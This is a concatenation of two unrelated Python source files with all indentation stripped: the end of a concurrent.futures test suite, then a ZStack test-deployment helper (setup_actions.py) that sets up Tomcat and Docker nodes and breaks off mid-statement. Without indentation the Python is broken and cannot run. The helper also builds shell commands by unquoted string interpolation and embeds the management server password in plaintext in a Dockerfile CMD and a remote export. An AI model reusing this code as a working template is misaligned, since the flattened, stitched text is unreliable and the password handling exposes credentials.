PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
def mul(x, y):
return x * y
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
class MyObject(object):
def my_method(self):
pass
def _test_traceback():
raise RuntimeError(123)
class ExecutorMixin:
worker_count = 5
def setUp(self):
self.t1 = time.time()
try:
self.executor = self.executor_type(max_workers=self.worker_count)
except NotImplementedError as e:
self.skipTest(str(e))
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
dt = time.time() - self.t1
if test_support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 60, "synchronization issue: test lasted too long")
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
import time
import sys
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
t = {executor_type}(5)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, unittest.TestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._threads), 3)
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
class ProcessPoolShutdownTest(ProcessPoolMixin, ExecutorShutdownTest, unittest.TestCase):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
del executor
queue_management_thread.join()
for p in processes.values():
p.join()
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, unittest.TestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldcheckinterval = sys.getcheckinterval()
sys.setcheckinterval(1)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setcheckinterval(oldcheckinterval)
class ProcessPoolWaitTests(ProcessPoolMixin, WaitTests, unittest.TestCase):
pass
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
future1 = self.executor.submit(time.sleep, 2)
completed = [f for f in futures.as_completed([future1,future1])]
self.assertEqual(len(completed), 1)
class ThreadPoolAsCompletedTests(ThreadPoolMixin, AsCompletedTests, unittest.TestCase):
pass
class ProcessPoolAsCompletedTests(ProcessPoolMixin, AsCompletedTests, unittest.TestCase):
pass
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.next(), (0, 1))
self.assertEqual(i.next(), (0, 1))
self.assertRaises(ZeroDivisionError, i.next)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@unittest.skip("Can't pickle bound methods in python2")
@test_support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=5.0)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegexp(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, unittest.TestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertEqual(sorted(finished), range(10))
def test_default_workers(self):
executor = self.executor_type()
self.assertEqual(executor._max_workers,
(multiprocessing.cpu_count() or 1) * 5)
class ProcessPoolExecutorTest(ProcessPoolMixin, ExecutorTest, unittest.TestCase):
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
def test_traceback(self):
future = self.executor.submit(_test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
class FutureTests(unittest.TestCase):
def test_done_callback_with_result(self):
callback_result = [None]
def fn(callback_future):
callback_result[0] = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result[0])
def test_done_callback_with_exception(self):
callback_exception = [None]
def fn(callback_future):
callback_exception[0] = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception[0].args)
def test_done_callback_with_cancel(self):
was_cancelled = [None]
def fn(callback_future):
was_cancelled[0] = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled[0])
def test_done_callback_raises(self):
# Use assert_python_ok since can't capture stderr from logger
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import Future
raising_was_called = [False]
fn_was_called = [False]
def raising_fn(callback_future):
raising_was_called[0] = True
raise Exception('doh!')
def fn(callback_future):
fn_was_called[0] = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
assert raising_was_called[0]
assert fn_was_called[0]
""")
self.assertEqual(rc, 0)
self.assertEqual(out, "")
self.assertIn('Exception: doh!', err)
def test_done_callback_already_successful(self):
callback_result = [None]
def fn(callback_future):
callback_result[0] = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result[0])
def test_done_callback_already_failed(self):
callback_exception = [None]
def fn(callback_future):
callback_exception[0] = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception[0].args)
def test_done_callback_already_cancelled(self):
was_cancelled = [None]
def fn(callback_future):
was_cancelled[0] = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled[0])
def test_repr(self):
self.assertRegexpMatches(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegexpMatches(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegexpMatches(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegexpMatches(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegexpMatches(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegexpMatches(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
@test_support.reap_threads
def test_main():
try:
test_support.run_unittest(__name__)
finally:
test_support.reap_children()
if __name__ == "__main__":
test_main()
|
setup_actions.py | '''
@author: Frank
'''
import os.path
import zstacklib.utils.xmlobject as xmlobject
import zstacklib.utils.linux as linux
import zstacklib.utils.shell as shell
import zstacklib.utils.log as log
import zstacklib.utils.lock as lock
import zstacklib.utils.ssh as ssh
import zstacklib.utils.http as http
import apibinding.api as api
import apibinding.inventory as inventory
import socket
import time
import os
import sys
import signal
import tempfile
import threading
import traceback
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.node_operations as node_ops
import zstackwoodpecker.ansible as ansible
import zstacktestagent.plugins.host as host_plugin
import zstacktestagent.testagent as testagent
logger = log.get_logger(__name__)
#This path should be aligned with Dockerfile
docker_apache_path = '/usr/local/zstack'
docker_service_start_timeout = 3
DEFAULT_PYPI_URL = 'https://pypi.python.org/simple/'
ENV_PYPI_URL = os.environ.get('ZSTACK_PYPI_URL')
if not ENV_PYPI_URL:
ENV_PYPI_URL = DEFAULT_PYPI_URL
USER_PATH = os.path.expanduser('~')
NODE_ANSIBLE_YAML = '%s/.zstackwoodpecker/ansible/node.yaml' % USER_PATH
#avoid of using http_proxy to impact zstack HTTP API request.
ENV_HTTP_PROXY = os.environ.get('woodpecker_http_proxy')
if not ENV_HTTP_PROXY:
ENV_HTTP_PROXY = ''
ENV_HTTPS_PROXY = os.environ.get('woodpecker_https_proxy')
if not ENV_HTTPS_PROXY:
ENV_HTTPS_PROXY = ''
NODE_PASSWORD = os.environ.get('ZSTACK_MANAGEMENT_SERVER_PASSWORD')
EXTRA_DEPLOY_SCRIPT = '%s/.zstackwoodpecker/extra_zstack_config.sh' % USER_PATH
node_exception = []
class ActionError(Exception):
'''action error'''
def shell_cmd_thread(shell_cmd, ignore_exception = False):
try:
shell.call(shell_cmd)
except Exception as e:
if not ignore_exception:
node_exception.append(sys.exc_info())
raise e
def restart_zstack_without_deploy_db(test_config_path):
'''
This API could be called, when zstack.war is rebuilt.
It will find all running nodes and deploy zstack.war to them.
'''
import zstackwoodpecker.test_util as test_util
test_config_obj = test_util.TestConfig(test_config_path)
all_config = test_config_obj.get_deploy_config()
plan = Plan(all_config)
plan.restart_war_on_all_nodes()
class Node(object):
'''
Node super class
'''
def __init__(self, plan_config):
self.node_ip = None
self.catalina_home = None
self.start_script = None
self.stop_script = None
self.webapps_path = None
self.src_war_path = None
self.war_path = None
self.war_folder = None
self.dst_zstack_properties = None
self.dst_cloudbus_properties = None
self.db_server = None
self.db_port = None
self.rabbitmq_server = None
#Need cleanup following 2 properties files after operations.
self.node_zstack_properties = None
self.node_cloudbus_properties = None
self._parse_node_config(plan_config)
def _parse_node_config(self, test_plan):
self._set_catalina_home(test_plan.catalina_home)
self._set_db_server(test_plan.db_server)
self._set_db_port(test_plan.db_port)
self._set_rabbitmq_server(test_plan.rabbitmq_server)
self._set_war_path(test_plan.war_path)
self._prepare_zstack_properties(test_plan.zstack_properties)
#self._prepare_cloudbus_properties()
def set_node_ip(self, node_ip):
self.node_ip = node_ip
#need to manually set nodeName
shell.ShellCmd("echo 'management.server.ip=%s' >> %s" % (self.node_ip, self.node_zstack_properties))()
def _set_catalina_home(self, catalina_home):
self.catalina_home = catalina_home
self.start_script = os.path.join(self.catalina_home, 'bin', 'startup.sh')
self.stop_script = os.path.join(self.catalina_home, 'bin', 'shutdown.sh')
self.webapps_path = os.path.join(self.catalina_home, 'webapps')
def _set_war_path(self, src_war_path):
self.src_war_path = src_war_path
self.war_path = os.path.join(self.webapps_path, os.path.basename(self.src_war_path))
self.war_folder = self.war_path.strip('.war')
self.dst_zstack_properties = os.path.join(self.war_folder, 'WEB-INF/classes/zstack.properties')
self.dst_cloudbus_properties = os.path.join(self.war_folder, 'WEB-INF/classes/springConfigXml/CloudBus.xml')
def _set_db_server(self, db_server):
self.db_server = db_server
def _set_db_port(self, db_port):
self.db_port = db_port
def _set_rabbitmq_server(self, rabbitmq_server):
self.rabbitmq_server = rabbitmq_server
def _prepare_zstack_properties(self, zstack_properties=None):
if not zstack_properties:
self.zstack_properties = self.dst_zstack_properties
else:
self.zstack_properties = zstack_properties
handler, tmpfile = tempfile.mkstemp()
shell.ShellCmd("/bin/cp -f %s %s" % \
(zstack_properties, tmpfile))()
#change db server
shell.ShellCmd("sed -i 's#mysql://localhost:3306#mysql://%s:%s#' %s" %\
(self.db_server, self.db_port, tmpfile))()
#change rabbitmq server
shell.ShellCmd("sed -i 's#CloudBus.serverIp.0 = localhost#CloudBus.serverIp.0 = %s#' %s" % (self.rabbitmq_server, tmpfile))()
#Remove management.server.ip, if existing.
shell.ShellCmd("sed -i '/management.server.ip=.*/d' %s" % tmpfile)()
self.node_zstack_properties = tmpfile
def _prepare_cloudbus_properties(self):
handler, tmpfile = tempfile.mkstemp()
shell.ShellCmd("/bin/cp -f %s %s" % \
(self.dst_cloudbus_properties, tmpfile))()
shell.ShellCmd("sed -i 's/localhost/%s/' %s" % \
(self.master_name, tmpfile))()
self.node_cloudbus_properties = tmpfile
def start_node(self):
print('Deloying war %s to tomcat in node: %s ...' % \
(self.src_war_path, self.node_ip))
def stop_node(self):
print('Stop tomcat in node: %s ...' % self.node_ip)
#must be called before exit Node operations.
def cleanup(self):
if os.path.exists(self.node_zstack_properties):
os.remove(self.node_zstack_properties)
#if os.path.exists(self.node_cloudbus_properties):
# os.remove(self.node_cloudbus_properties)
def wait_for_node_start(self):
pass
class HostNode(Node):
'''
Node on real exist host.
'''
def __init__(self, test_plan):
super(HostNode, self).__init__(test_plan)
self.node_username = None
self.NODE_PASSWORD = None
def set_username(self, username):
self.node_username = username
def set_password(self, password):
self.NODE_PASSWORD = password
def _rshell(self, cmd):
ssh.execute(cmd, self.node_ip, self.node_username, self.NODE_PASSWORD)
def prepare_node(self):
catalina_root = os.path.dirname(self.catalina_home)
catalina_tar_name = 'zstack_woodpecker_apache.tgz'
catalina_real_path = os.path.realpath(self.catalina_home)
catalina_real_name = os.path.basename(catalina_real_path)
catalina_real_root = os.path.dirname(catalina_real_path)
catalina_tar = '%s/%s' % (catalina_real_root, catalina_tar_name)
if not os.path.exists(catalina_tar):
os.system("cd %s; tar -zcf %s --exclude='logs/*' --exclude='webapps/zstack*' %s" % \
(catalina_real_root, catalina_tar_name, catalina_real_name))
ansible_cmd_args = "host=%s catalina_root=%s catalina_folder=%s \
catalina_tar=%s zstack_war=%s zstack_properties=%s pypi_url=%s" % \
(self.node_ip, catalina_root, self.catalina_home, catalina_tar, \
self.src_war_path, self.node_zstack_properties, ENV_PYPI_URL)
if ENV_HTTP_PROXY:
ansible_cmd_args = "%s http_proxy=%s https_proxy=%s" % \
(ansible_cmd_args, ENV_HTTP_PROXY, ENV_HTTPS_PROXY)
self.ansible_cmd = "%s -e '%s'" % (NODE_ANSIBLE_YAML, ansible_cmd_args)
def start_node(self):
try:
super(HostNode, self).start_node()
self.stop_node()
ansible_dir = os.path.dirname(NODE_ANSIBLE_YAML)
ansible.execute_ansible(self.node_ip, self.node_username, \
self.NODE_PASSWORD, ansible_dir, self.ansible_cmd)
start_node_cmd = 'export CATALINA_OPTS=" -Djava.net.preferIPv4Stack=true "; sh ' + self.start_script
if self.NODE_PASSWORD:
start_node_cmd = 'export ZSTACK_MANAGEMENT_SERVER_PASSWORD=%s; %s'\
% (self.NODE_PASSWORD, start_node_cmd)
self._rshell(start_node_cmd)
except Exception as e:
node_exception.append(sys.exc_info())
def stop_node(self):
super(HostNode, self).stop_node()
self._rshell('sh %s; \
ps -aef|grep java|grep -v grep; \
if [ $? -ne 0 ]; then \
sleep 1; \
ps -aef|grep java|grep -v grep;\
if [ $? -ne 0 ]; \
then pkill -9 java || true; \
fi; \
fi;' % \
self.stop_script)
class DockerNode(Node):
'''
Node running in Docker
'''
def __init__(self, test_plan):
#Only CentOS and Ubuntu supported docker at present.
try:
shell.ShellCmd('docker -v')()
except:
traceback.print_exc(file=sys.stdout)
raise ActionError('Did not find docker command. Can not run \
multi nowith dockerimage: %s.' % node.dockerImage_)
#check docker image
super(DockerNode, self).__init__(test_plan)
self.docker_image = None
self.br_dev = None
self.docker_folder = tempfile.mkdtemp()
zones_obj = test_plan.config.deployerConfig.zones
zones = zones_obj.get_child_node_as_list('zone')
net_dev = zones[0].l2Networks.l2NoVlanNetwork.physicalInterface__
br_dev = 'br_%s' % net_dev
self.set_br_dev(br_dev)
def cleanup(self):
super(DockerNode, self).cleanup()
if os.path.exists(self.docker_folder):
os.system('rm -rf %s' % self.docker_folder)
def set_br_dev(self, br_dev):
self.br_dev = br_dev
def set_docker_image(self, docker_image):
try:
shell.ShellCmd('docker images|grep %s' % docker_image)()
except:
traceback.print_exc(file=sys.stdout)
raise ActionError('Did not find docker image: %s by command: \
`docker image`' % docker_image)
self.docker_image = docker_image
def _setup_docker_bridge(self):
#enable bridge. use default l2network setting.
br_dev = 'br_%s' % self.br_dev
if not linux.is_bridge(br_dev):
linux.create_bridge(br_dev, br_dev)
#set docker args
rhel_docker_config = '/etc/sysconfig/docker'
ubuntu_docker_config = '/etc/default/docker'
if os.path.exists(rhel_docker_config):
open(rhel_docker_config, 'w').write('other_args="-b=%s"' % br_dev)
shell.ShellCmd('service docker restart')()
if os.path.exists(ubuntu_docker_config):
open(ubuntu_docker_config, 'w').write('other_args="-b=%s"' % \
br_dev)
shell.ShellCmd('service docker restart')()
def _prepare_docker_image(self):
#prepare new docker image with right ip address zstack.war, properties
shell.ShellCmd('cp -a %s %s' % (self.node_zstack_properties, \
self.docker_folder))()
#shell.ShellCmd('cp -a %s %s' % (self.node_cloudbus_properties, \
# self.docker_folder))()
shell.ShellCmd('cp -a %s %s' % (self.war_folder, \
self.docker_folder))()
dockerfile_content = ["FROM %s" % self.docker_image]
dockerfile_content.append("RUN rm -rf %s" % self.war_folder)
dockerfile_content.append("ADD %s %s" % \
(os.path.basename(self.war_folder), self.war_folder))
dockerfile_content.append("ADD %s %s" % \
(os.path.basename(self.node_zstack_properties), \
self.dst_zstack_properties))
#dockerfile_content.append("ADD %s %s" % \
# (os.path.basename(self.node_cloudbus_properties), \
# self.dst_cloudbus_properties))
if NODE_PASSWORD:
dockerfile_content.append('CMD \
export CATALINA_OPTS="-Djava.net.preferIPv4Stack=true" && \
export ZSTACK_MANAGEMENT_SERVER_PASSWORD="%s" && \
ifconfig eth0 %s && export ZSTACK_BUILT_IN_HTTP_SERVER_IP=%s && \
/bin/sh %s/apache-tomcat/bin/startup.sh \
&& tail -f %s/apache-tomcat/logs/catalina.out ' % (NODE_PASSWORD, \
self.node_ip, self.node_ip, docker_apache_path, \
docker_apache_path))
else:
dockerfile_content.append('CMD \
export CATALINA_OPTS="-Djava.net.preferIPv4Stack=true" && \
ifconfig eth0 %s && export ZSTACK_BUILT_IN_HTTP_SERVER_IP=%s && \
/bin/sh %s/apache-tomcat/bin/startup.sh \
&& tail -f %s/apache-tomcat/logs/catalina.out ' % (self.node_ip, \
self.node_ip, docker_apache_path, docker_apache_path))
open(os.path.join(self.docker_folder, 'Dockerfile'), \
'w').write('\n'.join(dockerfile_content))
print 'Dockerfile is prepared.'
def prepare_node(self):
self._setup_docker_bridge()
self._prepare_docker_image()
def start_node(self):
def _wait(data):
try:
shell.ShellCmd('docker ps')()
print('docker service is ready')
return True
except:
print ('docker service is still starting ...')
return False
try:
if not linux.wait_callback_success(_wait, None, \
docker_service_start_timeout, 0.1):
raise ActionError('waiting for docker start up time out: %s' % \
docker_service_start_timeout)
shell.ShellCmd('cd %s ; docker build --tag="%s" .' % \
(self.docker_folder, self.node_ip))()
#run docker image
shell.ShellCmd("docker run -d %s " % self.node_ip)()
print 'docker container has been created.'
except Exception as e:
node_exception.append(sys.exc_info())
def stop_node(self):
shell.ShellCmd("docker stop \
`docker ps -a|grep %s|awk '{print $1}'`|| true" \
% self.node_ip)()
shell.ShellCmd("docker rm \
`docker ps -a|grep %s|awk '{print $1}'`|| true" \
